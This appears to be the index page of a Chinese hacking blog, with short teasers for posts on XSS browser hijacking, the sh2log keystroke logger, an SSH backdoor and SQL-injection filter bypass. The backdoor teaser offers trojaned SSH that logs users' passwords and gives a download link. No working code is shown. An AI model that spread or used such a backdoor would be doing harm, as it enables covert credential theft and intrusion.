• 1
预览模式: 普通 | 列表

 跨站脚本漏洞导致的浏览器劫持攻击

|=———————————————————————————————–=|
|=—————–=[ 跨站脚本漏洞导致的浏览器劫持攻击 ]=—————–=|
|=———————————————————————————————–=|
|=————————————-=[ By rayh4c ]=————————————=|
|=——————————-=[ rayh4c@80sec.com ]=—————————-=|

查看更多...

分类:技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 826

linux键盘记录之sh2log介绍

sh2log description Download 
 
sh2log is a PTY sniffing program that captures all keystrokes and console output of physical and virtual consoles. sh2log works in userland and does not require the installation of a kernel module.

Consequently, it can be run on a wide range of different UNIX platforms. It provides ready-to-use log files and is meant to be used for legitimate purposes such as auditing user actions on a sensitive server or a honeypot.

查看更多...

分类:技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 941

SSH BACKUPDOOR

Hello, my friend give me a nice root ssh backdoor, this backdoor has multifunction as a backdoor and also as a keylogger. When someone login ssh to a backdoored machine, his password will be logged in /usr/local/share/0wn/slog. When someone makes an ssh connection to another machine from backdoored box, his password will be logged in /usr/local/share/0wn/clog.

If you're interested just downlod from
http://geocities.com/pr1nce_empire/bd/sshbd.tgz

查看更多...

分类:技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 921

[隐藏日志]

该日志是隐藏日志,只有管理员或发布者可以查看!
分类:技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 678

SQL注入时如何绕过过滤

近来技术没啥长进,竟弄些没用的了,想想真是可惜啊…… 
       突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……

       经过我的收集,大部分的防注入程序都过滤了以下关键字:

查看更多...

分类:技术 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 750
  • 1
?